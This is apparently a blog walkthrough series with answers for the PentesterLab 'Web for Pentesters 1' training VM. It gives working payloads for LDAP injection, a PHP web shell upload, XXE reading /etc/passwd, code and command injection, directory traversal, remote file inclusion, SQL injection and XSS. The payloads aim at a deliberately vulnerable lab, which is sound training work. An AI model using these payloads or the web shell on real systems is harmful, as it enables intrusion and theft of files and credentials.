Web for pentesters 1, LDAP,File upload and XML attacks.

In this post ill be walking through the web for pentesters 1 LDAP, file upload and XML attacks. These are the last of the exercises for the virtual machine and will conclude this series.

First off what is LDAP? LDAP (lightweight Directory Access Protocol) is a protocol for accessing and maintaining a directory over the internet. So it basically allows a user to access a directory remotely and modify it as if they where on that physically on that machine.

LDAP Answers:
Example 1:
For the first example, we just remove everything in the URL from php? on-wards and this should result in you being authenticated.

Example 2:
For example 2 you will need to comment out the rest of the code and have the protocol accept any password you pass it.

the URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))&password=fake.

is a null byte that comments out any code after it.

File Upload:

The code we will use in the file that will be uploaded if the following:
<?php
    system($_GET[“cmd”]);
?>

Copy that into the a php file.
example 1:
Upload the php file with the code above, once uploaded follow the link provided by the vm. 
Once on that page, you should get an error saying the system cannot execute a blank command
All you now have to do is append ?cmd=cat /etc/passwd to output the passwd file contents on the page.
example 2:
For this example you will need to create a new file with the code above and the extension .php.blah, you swap blah for something else, just make sure the server can’t process it.
Upload the file, click the link and you should get the same error you got in example 1. Now all you have to do is append ?cmd=cat /etc/passwd to the URL and you should get the passwd file displayed.
XML attack:
Example 1:
Here all you have to is type in the command provided by pentesterlabs into the URL with a null byte () at the end and the exploit should work.
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20″file%3a%2f%2f%2fetc%2fpasswd”>%5d><test>%26hacker%3b<%2ftest>%0a%0a
Example 2: 
If you follow what is on pentesterslab, the exploit should work and give you the password pentesterlab.

Web for Pentesters 1- Code injection and Command Injection

In this section I’ll go through the code and command injection exercises. While code injection and command injection are very similar they differ in execution. In code injection, you deliver the command as part of the data you pass into the web app, i.e in the username field or comment section. In command injection, the web app excepts a certain command to be passed but another command is also inserted with it.

Code Injection

example 1:

name=hacker”.system(%27uname%20-a%27);//
                OR
name=hacker”.system(%27uname%20-a%27);#
The comment string, comments out the last of the code which helps escape the eval function and executes the uname -a command on the server returning the server software.

example 2:

example2.php?order=id);}system(%27uname%20-a%27);//
Here we’re closing out the php function, strcmp(), with the ) and closing out the user created function with the }.
After that, we can inject our system function which executes the uname -a command like before. Then commenting out the rest of the code.

example 3:

example3.php?new=hacker&pattern=/lamer/e&base=Hello%20lamer
place the e in-between / and &base to produce the error.
Basically this error means that the server is trying to execute the ‘hacker’ value, but can’t as it does not exist.
So know we can run any command just by replacing the value hacker with any command we want, like so:
example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
Displays the phpinfo page.
example3.php?new=system(%27uname%20-a%27)&pattern=/lamer/e&base=Hello%20lamer
This will run the uname -a command on the system and return the system name.

example 4:

adding ‘ or ” to the end of hacker will produce the error.
The assert function in php checks to see if the value passed in is false.
example4.php?name=hacker%27.phpinfo().%27
this will escape the assert function and execute the command, phpinfo, and display its contents to the web page.
Next up is command injection.

Command Injection

example 1:

example1.php?ip=127.0.0.1%26%26cat%20/etc/passwd
Basically there’s no validation or encoding here, so inserting %26%26cat /etc/passwd outputs the passwd file to the webpage.
%26%26=&&

example 2:

example2.php?ip=127.0.0.1%0acat%20/etc/passwd
Here you can by pass the the validation by passing the a newline encoding and passing in a new command.
n(new line) = %0a

example 3:

Using the telnet command, I was able to get the it to work.
telnet <vm’s ip> 80
Then pass in the command:
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0
This should display the system name in-between pre tags, towards the bottom of the output.

Web for pentesters 1- directory traversal and file include

Continuing with the series of web for pentesters 1 walk-through, this post will focus on directory traversal and file include exercises in the ISO. Let’s start off with what these attacks are and how they can be prevented. First off what is a directory traversal attack? In basic terms, this attack allows someone to view files outside of the web application directory, i.e view the shadow file of the web server. You can prevent this by validating user input and URL’s returned to the server ( more info here).

File inclusion is uploading a file to the server, in a file type that wasn’t intended, like uploading a bash script disguised as a text file. This type of exploit can lead to attacks like cross-site scripting (more info here). You can prevent this by validating the files uploaded by the user (running theme with a lot of exploits). 
As per usual, pentesterlabs has a very good explanation of theses exploits in the course section for this ISO. So with out further delay, here are some sample answers:
Directory Traversal:
example 1:
wget -0 – ‘http://<vmip>/dirtrav/example1.php?file=../../../../../../../etc/passwd’ > e1.txt
outputs the contents into file e1.txt
You could also put the link directly into the browser and have it display the passwd file.
example 2:
example2.php?file=/var/www/file/../../../etc/passwd’ > e2.txt
outputs the contents into file e2.txt
example 3:
example3.php?file=../../../../../../../etc/passwd 
File Include:
Use this link from pentesterslab to test for file inclusion
https://pentesterlab.com/test_include.txt
example 1:
fileincl/example1.php?page=https://pentesterlab.com/test_include.txt
This will display the php info page.
example 2:
http://172.16.224.130/fileincl/example2.php?page=https://pentesterlab.com/test_include.txt
Append a URL encoded null byte to the end of the string and it will display the php info page.

Web for Pentesters- SQL Injection

Part 2 of the web for pentesters walk-through. In this part, we’ll go through what SQL injection is and how to exploit it in the pentesterlabs virtual machine (here). In basic terms, SQL injection is injecting sql commands into a application and then outputs something the developer didn’t intend. This happens because the developer does not sanitise the users input properly. For this section, it would be really helpfully if you have a url encoder, there are plenty online or build your own one.

The following are some sample answers for the SQL Injection section of the VM, if you need an explanation of how these exploits work, penetesterlab course explains each one perfectly:

example 1:
?name=root’ or ‘1’=’1′ %23
# = %23

example 2:
?name=root’%09or%09’1’=’1
t=%09 (url encoding)

example 3:
?name=root’/**/or/**/’1’=’1

example 4:
?id=2/**/or/**/1=1

example 5:
?id=2%20or%201=1

example 6:
?id=2%20or%201=1

example 7:
?id=2%OA or 1=1
%OA = newline character

example 8:
do what is said in the walkthrough, no real payload as everything is showing already.

example 9:
?order=IF(0,name,age)

Web for pentesters 1 Cross-Site Scripting (XSS)

First series of posts will focus on web for pentester 1 by pentesterlab. A walk-through is provided on the site, which I recommend going through before looking at the answers I provide.
Here are some sample answers for the cross-site scripting section of the virtual machine. If you require some explanation as to what cross-site scripting is and how it works, there is a section in the walk-through accompanying this virtual machine on pentester labs, but also nice explanation by Daniel Miessler found here.
If your running some sort of ad-blocker or script-blocker, you may need to disable it for the answers to work.
example 1:
<script>alert(1)</script>
This causes an alert box to pop up.
example 2:
<SCript>alert(1)</Script>
This will cause an alert box to pop up.
example 3:
<Scr<Script>ipt>alert(1)</Sc</Script>ript>
This will cause an alert box to pop up.
example 4:
<a onmousemove=”alert(1)”/>
Once you move the mouse over the web page, an alert box will pop up.
example 5:
<script>eval(String.fromCharCode(097,108,101,114,116))(1)</script>
This converts the ascii numbers into the string alert, which will cause an alert box to pop up.
example 6:
1″;alert(1)//
Again, another alert box will be displayed.
example 7:
1′;alert(1)//
Alert box will be displayed.
example 8:
in the address bar type:
/”><SCRIPT>alert(String.fromCharCode(49))</SCRIPT>
converts the 49 into the number 1. similar to example 5, you can also replace the 49 with a string of ascii.
example 9:
after the # symbol
<script>alert(1)</script>